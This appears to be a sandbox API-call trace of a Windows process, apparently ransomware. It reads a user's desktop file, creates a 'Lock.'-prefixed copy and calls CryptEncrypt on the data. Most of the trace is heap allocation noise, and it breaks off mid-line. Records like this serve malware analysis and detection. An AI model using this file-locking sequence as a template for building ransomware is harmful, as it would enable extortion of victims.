[0129.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0129.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0129.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0129.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0129.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0129.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0129.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0129.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0129.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0129.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0129.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0129.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0129.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0129.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0129.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0129.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0129.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0129.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0129.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0129.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0129.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0129.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0129.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0129.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54620 | out: hHeap=0x970000) returned 1 [0129.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0129.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0129.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0129.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0129.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0129.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0129.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0129.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0129.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0129.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0129.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0129.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0129.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0129.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0129.052] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0129.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0129.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0129.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0129.052] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0129.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0129.052] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0129.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0129.052] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0129.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0129.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0129.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0129.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0129.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0129.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0129.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0129.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0129.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0129.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0129.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2e80330 [0129.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0129.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0129.054] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/-U62pFYLePGc.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\-u62pfylepgc.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0129.055] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.055] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0129.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0129.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0129.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0129.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0129.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0129.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0129.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0129.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0129.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0129.055] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0129.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0129.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0129.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0129.055] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0129.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0129.056] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0129.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0129.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0129.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0129.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0129.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0129.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0129.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0129.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0129.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0129.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0129.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0129.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0129.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0129.056] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0129.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0129.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0129.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0129.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2e90338 [0129.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0129.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0129.057] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.-U62pFYLePGc.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.-u62pfylepgc.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0129.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0129.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0129.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0129.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0129.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0129.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0129.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0129.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0129.141] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0129.141] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0129.141] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0129.141] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0129.145] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0129.145] ReadFile (in: hFile=0x2d0, lpBuffer=0x2e80330, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2e80330*, lpNumberOfBytesRead=0x8cf4f8*=0xa916, lpOverlapped=0x0) returned 1 [0129.150] ReadFile (in: hFile=0x2d0, lpBuffer=0x2e80330, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2e80330*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0129.156] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0129.156] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0129.156] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0129.156] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0129.156] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0129.157] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0129.157] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0129.157] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0129.157] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0129.157] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0129.157] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0129.157] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0129.157] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0129.157] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0129.157] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0129.157] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0129.157] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0129.157] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0129.157] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0129.157] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0129.157] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0129.157] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0129.157] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0129.157] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0129.157] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0129.157] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0129.158] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0129.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0129.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50b78 [0129.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50b78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0129.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0129.158] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0129.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0129.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0129.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e544b8 [0129.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0129.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0129.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0129.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0129.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0129.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0129.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0129.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0129.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0129.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0129.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0129.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0129.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0129.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0129.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0129.159] CryptEncrypt (in: hKey=0xa87590, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xa916, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xa918) returned 1 [0129.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0129.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0129.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0129.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0129.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0129.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0129.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0129.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0129.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0129.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0129.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0129.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0129.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0129.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0129.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0129.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0129.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0129.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0129.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0129.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0129.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0129.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0129.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0129.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0129.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0129.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0129.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0129.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0129.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0129.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0129.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0129.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0129.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0129.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0129.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0129.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0129.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0129.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0129.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0129.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0129.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0129.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0129.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0129.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0129.161] HeapFree (in: 